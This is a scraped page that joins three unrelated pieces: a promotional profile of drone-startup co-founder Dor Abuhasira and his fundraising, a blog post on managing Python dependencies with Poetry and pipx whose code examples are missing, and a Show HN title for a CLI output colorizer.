different experience with his mandatory military service. Instead of intense technical training in the military, Dor’s biggest takeaways from this time really centered on character building, and when it comes to being an entrepreneur, he says that it is probably the best asset you can have. He learned to constantly solve problems, to handle tough situations, and to gain confidence in leading others. After his military service, Dor took an extended trip around the world and through South America. Then he headed back to school to study electrical engineering. On graduation, the logical next step was to get to work. He headed into the corporate environment, and learned how to build real products, R&D, how the high tech industry worked, and what his value was in creating products. Here, he quickly learned two things: On his journey of building his own startup, Dor has learned quite a bit about common misconceptions, the people you need to add to your team, and overcoming the challenges of being a technical founder to build products with real commercial value. See How I Can Help You With Your Fundraising Efforts Fundraising Process : get guidance from A to Z. Materials : our team creates epic pitch decks and financial models Investor Access : connect with the right investors for your business and close them Book a Call Since childhood Dor had been building things in a garage with his friend Raviv Raz. Raviv had been working at the largest drone manufacturer in Israel, Israel Aerospace Industries. 
They accomplished a lot on the weekends, including flying drones and retrieving aerial images and autonomously sending out drones. Together they decided they could accomplish some pretty amazing things, and struck out to co-found their startup Percepto together. Then they added Sagi Blonder to the team that Dor had met while getting his Master’s in computer vision at Ben Gurion University. They wanted the best possible tech team, as the common wisdom at the time was that if you have the best technology product, then everything else is solved. Of course, that can be far from the truth in reality. They also learned not to rely on the media for how hot a market is, and how big the demand really is. Drones may have been hot in magazines and on the web, but they soon found out that real commercial demand wasn’t there. Everyone, including VCs, loved the idea of drones. They would happily arrange meetings to see them in action. Yet, when it came to sales and putting real capital in the bank, it just wasn’t happening. The real tipping point for Dor was when they joined startup accelerator Elevator Fund. The little bit of seed funding certainly helped. Though more importantly, their technical team was forced to defend their opinions, get clarity on their value, and figure out how to translate what they were saying to potential investors and customers. They’ve now raised at least $73M in capital, and count giant organizations worth tens of billions of dollars as clients. That includes major power companies on the US east and west coast, such as FPL in Florida and PG&E in California. These organizations are using their autonomous drones to accumulate much more data through constant inspections, and actionable reports. Residents may find this not only helps with the consistency of service, but can help keep them safer and avoid disasters like wildfires caused by faulty equipment. Storytelling is everything which is something that Dor Abuhasira was able to master. Being able to capture the essence of what you are doing in 15 to 20 slides is the key. For a winning deck, take a look at the pitch deck template created by Silicon Valley legend, Peter Thiel (see it here) where the most critical slides are highlighted. Remember to unlock the pitch deck template that is being used by founders around the world to raise millions below. To get here Percepto ended up adding a fourth cofounder, to come in as their Chief Commercial Officer. Some of Dor’s top takeaways have also included understanding your customer and their real need and sales cycle, as well as constantly working to de-risk your business, and how to present to investors when you are creating a new market, with new technology, and few if any benchmarks to make them comfortable. Listen in to the full podcast episode to find out more, including: Alejandro Cremades · EP 313 Dor Abuhasira On Raising $73 Million To Create Autonomous Drones
1
Improving Python Dependency Management with Pipx and Poetry
Over time, how I develop applications in python has changed noticeably. I will divide the topic into three sections and see how they tie into each other at the end. Under development, the issues I will focus on are the following: Historically, the way to do dependency management was through requirements.txt. I found requirements.txt hard to manage. In that setup, adding a dependency and installing it was two steps: While focused on development, I would often forget one or both of these steps. Also, the lack of a lock file was a small downside for me (could be a much larger downside for others). The separation between pip and requirements.txt can also easily lead you to accidentally depend on packages installed on your system or in your virtualenv but not specified in your requirements.txt. Managing virtualenvs was also difficult. As a virtualenv and a project are not related, you need a directory structure. Otherwise, you can’t tell which virtualenv is being used for which project. You can use the same virtualenvs for multiple projects, but that partially defeats the point of virtualenvs and makes requirements.txt more error-prone (higher chances of forgetting to add packages to it). The approach generally used is one of the following two: I preferred the second one as the first one nests the source code one directory deeper. In PEP-518 , python standardized the pyproject.toml file which allows users to choose alternate build systems for package generation. One such project that provides an alternate build system is Poetry . Poetry hits the nail on the head and solves my major gripes with traditional tooling. Poetry manages the virtualenvs automatically and keeps track of which project uses which virtualenv automatically. Working on an existing project which uses poetry is as simple as this: The poetry install command sets up the virtualenv, install all the required dependencies inside that, and sets up any commands accordingly (I will get to this soon). To activate the virtualenv, simply run: I wrap this in a small function which lets me toggle it quickly: Running poet activates the virtualenv if it is not active and deactivates it if it is active. To make things even easier, I automatically activate and deactivate the virtualenv as I enter and leave the project directory. To do so, simply drop this in your .bashrc. This ties in well with the poet function; if you use poet anytime in a bash session, activation switches from automatic to manual and changing directories no longer auto-toggles the virtualenv. Instead of using requirements.txt, poetry stores the dependencies inside pyproject.toml. Poetry is more strict compared to pip in resolving versioning issues. Dependencies and dev-dependencies are stored inside tool.poetry.dependencies and tool.poetry.dev-dependencies respectively. Here is an example of a pyproject.toml for a project I am working on. One of the upsides of poetry is that you don’t have to manage the dependencies in pyproject.toml file yourself. Poetry adds an npm-like interface for adding and removing dependencies. To add a dependency to your project, simply run poetry add bar and it will add it to your pyproject.toml file and install it in the virtualenv as well. To remove a dependency, just run poetry remove bar. For development dependencies, just add the --dev flag to the commands. Since poetry replaces the build system, we can now configure the build using poetry via pyproject.toml. 
Inside pyproject.toml, the tool.poetry section stores all the build info needed; tool.poetry contains the metadata, tool.poetry.dependencies contains the dependencies, and tool.poetry.source contains private repository details (in case you don’t want to use PyPI). One of the options is tool.poetry.scripts. It contains scripts that the project exposes. This replaces console_scripts in entry_points of setuptools. This will add a script named foobar in your PATH. Running that is equivalent to running the following script. For further details, check the reference.

Poetry also removes the need for manually doing editable installs (pip install -e .). The package is automatically installed as editable when you run poetry install. Any scripts specified in tool.poetry.scripts are automatically available in your PATH when you activate the venv. To build the package, simply run poetry build. This will generate a wheel and a tarball in the dist folder. To publish the package to PyPI (or another repo), simply run poetry publish. You can combine the build and publish into one command with poetry publish --build.

This part is more user-facing than dev-facing. If you want to use two packages globally that expose some scripts to the user (e.g. awscli, youtube-dl, etc.), the general approach is to run something like pip install --user youtube-dl. This installs the package at the user level and exposes the script through ~/.local/bin/youtube-dl. However, this installs all the packages at the same user level. Hypothetically, if you have two packages foo and bar which have conflicting dependencies, this causes an issue. If you run, While installing bar, pip will install the dependencies for bar which will break foo after warning you. To solve this, there is pipx. Pipx installs each package in a separate virtualenv without requiring the user to activate said virtualenv before using the package. In the same scenario as before, doing the following works just fine. In this scenario, both bar and foo are installed in separate virtualenvs so the dependency conflict doesn’t matter. Prefixing any command with wnp runs it outside the virtualenv if a virtualenv is active. Running pm turns off automatic virtualenv activation.
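To make the contrast concrete, here is roughly what the two approaches look like side by side. foo and bar are placeholder package names; the pipx commands are just the standard pipx install invocations:

# One shared user-level environment: the second install can break the first
# if foo and bar pin conflicting versions of a shared dependency.
pip install --user foo
pip install --user bar

# With pipx, each tool gets its own virtualenv, and its entry points are
# still exposed on your PATH (via ~/.local/bin), so the conflict never arises.
pipx install foo
pipx install bar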
1
Show HN: Limner – colorizes and transforms CLI outputs
SignorMercurio/limner